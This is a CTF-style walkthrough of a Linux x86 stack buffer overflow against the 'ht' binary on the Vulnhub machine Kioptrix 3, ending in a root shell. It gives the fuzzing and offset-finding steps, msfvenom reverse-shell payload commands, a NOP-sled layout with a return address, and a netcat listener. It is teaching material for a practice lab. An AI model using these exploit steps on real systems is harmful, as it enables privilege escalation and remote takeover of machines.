Linux Stack Based Buffer Overflow x86

What is a buffer overflow?

A buffer overflow occurs when the part of a program that receives input receives too much input and has not been coded to handle it gracefully, causing the extra input to overflow into adjacent locations in memory and overwrite them. A properly coded program should handle excess input appropriately to prevent any memory leakage arising.

The below example shows what happens when a buffer overflow occurs.

CPU Registers and Memory pointers

When a program first starts it is pulled off the hard disk and put into memory so it can be read and written too much faster than if it was on the hard drive. The code is read using a memory pointer. The pointer reads the code line by line, top down and the cpu then executes each line accordingly.

Programming languages are designed to jump around, store values(variables) and have segments of code reused. These variables are stored in memory locations and the CPU registers are what keeps track of the locations and jump points so when the program is running, the memory pointer gets to these CPU registers and is sent to the correct locations in memory.

For buffer overflows the main three CPU registers that are important are the EIP, EBP and ESP registers.

EIP: Extended Instruction Pointer. This points to the next location in memory after the current process has finished executing.

ESP:Extended Stack Pointer. This points to the location on the top of the memory stack.

EBP: Extended Base Pointer. This points to the location at the bottom of the memory stack

Why is this bad

EIP points to the next memory location to be executed. If a user can overflow the buffer and cause their own input to overwrite EIP then the user can also point EIP to any memory location they wish.

Walkthrough of a Buffer Overflow

For this example I will use a box I recently completed on vulnhub called Kioptrix 3. After initial foothold of the user account and enumeration I found a binary that ran with superuser privileges. It turns out that this was exploitable via a buffer over flow.
Running the HT program without any arguments with sudo:
Running the program with arguments shows that it was indeed loading in the argument passed to it and trying to run the program.

Testing for Buffer Overflow aka: Fuzzing

Seeing as we can send arguments to the program, lets try and pass in an argument of 1000 characters. For this I will use python as python happens to be installed and the interpreter can be run directly from the command line to pass in arguments to the HT program. I will pass in 1000
sudo ht $(python -c “print ‘A’ * 1000)
No crash:
Trying with 10,000 “A” characters.
This caused a segmentation fault. IE: A break in memory causing the program to crash. It looks like at some point in our 10,000 As they spilled over and into EIP causing EIP to point to the location of AAAA or in hex \x41\x41\x41\x41.
This is what has actually happened:

Confirming EIP was overwritten

Now that we have confirmed that there is a buffer over flow occurring. We need to examine the program while it is running in memory so we can locate EIP and then point it to our malicious code. I will be using a command line debugger called GDB as it so happens to be installed on the machine I am exploiting.
Set GDB to show Intel CPU registers:
gdb -q /usr/local/bin/ht
set disassembly-flavor intel
Fuzzing the program within GDB to find roughly how many A’s before the overflow and overwrite of EIP:
(Note, this took some back and forth to narrow down roughly where the crash occured. Too many A’s resulted in EIP being overwritten by other parts of memory and thus overwriting our A’s. So in order to narrow it down I found that after 4500 bytes it crashed and before 3500 bytes it did not. I then incremented up 200 bytes each time to catch the crash with our A’s written into EIP.
NOTE: I used U instead of A for this example however it makes no difference. 4 bytes are 4 bytes….
run $(python -c “print ‘U’ * 3600”)
run $(python -c “print ‘U’ * 3800”)
run $(python -c “print ‘U’ * 4000”)
run $(python -c “print ‘U’ * 4200”)
Since we got a crash, GDB will pause running of the program exactly where the crash occurred and let us examine the code. Viewing the CPU register information we can see that EBX, ESI, EDI and EIP have all been overwritten by the letter ‘U’. It is displaying 55 as U in hex is \x55
Determining the Offset and controlling EIP

Now that we have overwritten EIP we need to find at exactly which point our bytes filled into EIP. We know that it happened somewhere between 4000 bytes and 4200 bytes. The easiest way to do this is to generate a completely unique string of 4200 bytes and then check the bytes that landed into EIP and locate those bytes in our 4200 unique string. This will tell us at exactly which point our bytes landed into EIP.

Metasploit comes with a pattern offset tool for exactly this purpose. Run the tool with the -l switch followed by the length of unique bytes to generate. In our case 4200.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 4200


Now instead of sending 4200 ‘U’ characters into the program we now send this unique string.

run $(python -c “print ‘Aa0Aa1Aa2Aa3Aa4Aa5…<SNIP>…Bn6Bn7Bn8Bn9′”)

EIP has now been overwritten by 4 unique bytes that we can copy and use to find the exact location in our 4200 unique string.

Metasploit contains a tool for finding our offset using this value:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x34674633
[*] Exact match at offset 4091
This tells us that it took exactly 4091 bytes to reach EIP and the next 4 bytes are 0x34674633.
Our memory now looks like this:

Before creating our malicious shellcode we must first confirm we control EIP. Instead of sending 4200 ‘U’ and causing a crash we will send 4091 U’s followed by 4 A’s. This should result in memory registers before EIP being overwritten by 55(Hex value for U) and EIP being over written by exactly four 41s(Hex value for A). We know our total length of our buffer including EIP is 4095. (4091 for the offset plus 4 for EIP).

run $(python -c ‘print “\x55” * (4095 -4) + “\x41” * 4’)

And as expected, the four A’s have landed perfectly into EIP 🙂
Now that we have confirmed we can control EIP to point to any memory location we wish, we can create our malicious code which we will then point to with the EIP register.

Before creating final shellcode

Before creating shellcode there are a few cleanup tasks that need to be done to ensure our code is executed flawlessly. The first thing is to ensure we have enough room to fit our code within the buffer. Our code must be shorter than 4091 bytes. Additionally we need to pad our code to create empty space between ESP(Start of the stack) and the start of our code. The first reason for creating space is because of the technique we are going to use which will be explained later. The second is that the stack size can move about and “wobble” as other programs and functions are being run and pushing and popping things around in other memory segments.

Get the size of shellcode

To create our shell code I will be using another one of metasploits tools called msfvenom. Msfvenom makes it extremely easy to whip up simple backdoors and reverse shells. The reverse shell I will be using for this is a standard tcp reverse shell with code output in C shellcode:

msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=6000 –platform linux –arch x86 –format c
No encoder specified, outputting raw payload
Payload size: 68 bytes
Final size of c file: 311 bytes
unsigned char buf[] =

Identify and remove bad characters

The second cleanup task is identifying any bad characters in our shell code that could be interpreted by the program and cause our exploit to fail. For example, the characters in code that create a new line look like this in hex ‘0x0a’. So if our shellcode contains any 0x0a then our code will not run as the 0x0a will cause a new line and break the program. We do not know how the HT program we are exploiting was written and what bad chars are in there that may conflict with our shell code so in order to find any bad chars we need to submit the entire hex table into the HT program and examine it on the memory heap while noting down any missing characters indicating “bad chars”.

Because we are submitting less than 4091 characters which will not crash the program we need to setup a break point in the program that will stop when it runs the function that takes our supplied argument and let us examine it directly on the memory heap.
Start a fresh gdb to completely clear out memory and then run “disassemble main”. This will show all of the functions inside the program. From the below output we can see that there is a call to a function called <_Z10ht_strlcpyPcPKcj> that looks like it contains a string copy function within it. Lets set a break point there and run our hex table through the program and see if it hits our breakpoint.
Now submit the hex table and see if our break point gets hit. Note how I am still utilising our entire buffer size and simply subracting 256 bytes from the end of the X55s and 4 byte EIP to account for the memory table and then adding the 4 byte EIP back at the end. Our string we are sending looks like this:
3835 x55, 256 hex table, 4 x66
We hit our breakpoint at the function ht_strlcpy within function Z10ht_strlcpyPcPKcj. Viewing the breakpoint info shows us a function called ht_strlcpy that accepts infinite chars, infinite constants and an unsigned int. Looks like this is where the overflow is occuring.
Read 5000 bytes of ESP
x/5000xb $esp+2000
You can see within the memory heap our first 3835 x11 bytes and after scrolling down for a bit they are immediately followed by the hex table we added and finished off with the 4 x66 bytes.
Beginning of hex chart
End of hex chart with 4 bytes at the end
Now we need to read each value off the hex chart and note down any missing hex values.
The bad characters identified are:
Create shellcode excluding the bad chars
msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=6000 –format c –arch x86 –platform linux –bad-chars “\x00\x09\x0a\x20”
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 425 bytes
unsigned char buf[] =
Notice that our shellcode is now 95 bytes.In order to remove the bad chars the new payload was encoded with encoder shikata_ga_nai


We now have our total buffer size of 4095 bytes, our final shell code of 95 bytes, and our EIP of 4 bytes. That leaves us with 3,996 bytes of additional space in our buffer that we need to fill with something. But what? I mentioned before that memory “wobbles” around as other parts of memory are altered so how can we point EIP to the start of our shell code if the exact address is likely to change? If we fill the left over 3,996 bytes with x11 then their is a good chance we will hit those instead of our shell code.

Introducing NOPs

NOP is short for “No-Operation” and it is exactly what it stands for. When the memory pointer lands on a NOP it does nothing and moves to the next line of code. So what we can do to get around the wobble in memory is fill the first 3496 bytes of our buffer with X11 and then 500 bytes of NOPs, followed by 95 bytes for our shellcode and point our 4 byte EIP to a memory address in the middle of our NOPs. This way it does not matter if the pointer does not land directly onto the memory address we pointed it to as it is guaranteed to land on a NOP and move to the next NOP, and then the next NOP and keep hitting NOPs until it slides down all of the NOPs and lands bang on into our shell code. This type of attack is what is called a “NOP Sled” as the memory pointer slides down the NOPs like a sled down a mountain.
After adding NOPs to our buffer it should look like this:
Buffer = “\x55” * (4095 – 500 – 95 – 4)
NOPs = “\x90” * 500
Shellcode = “\x44” * 95
EIP = “\x66” * 4
Running this through GDB and checking the stack when it hits the break point:
$(python -c ‘print “\x55” * (4095 – 500 – 95 – 4) + “\x90” * 500 + “\x44” * 95 + “\x66” * 4’)
First 3496 of the buffer filled with x55 before getting to 500 x90(NOPS) followed by 95 x44 for our shell and finally the 4 x66 for EIP:
The next step is to replace the 95 x44 bytes with our shellcode.
The final step is to find a memory address within the NOPs and point EIP to it.
Due to the way intel CPUs process memory we need to enter this address into EIP backwards. This is known as “Little Endian” format. Our chosen address looks like this in EIP: \x5c\xf8\xff\xbf


Before executing the exploit we need to setup our listener. We set our payload to connect to our IP address on port 6000. I will be using netcat for simplicity however for post exploitation a metasploit handler would be better.
nc -lnvp 6000
Run the exploit through the ht program as sudo so our code is executed with super user privileges and catch the connection giving root access to the machine.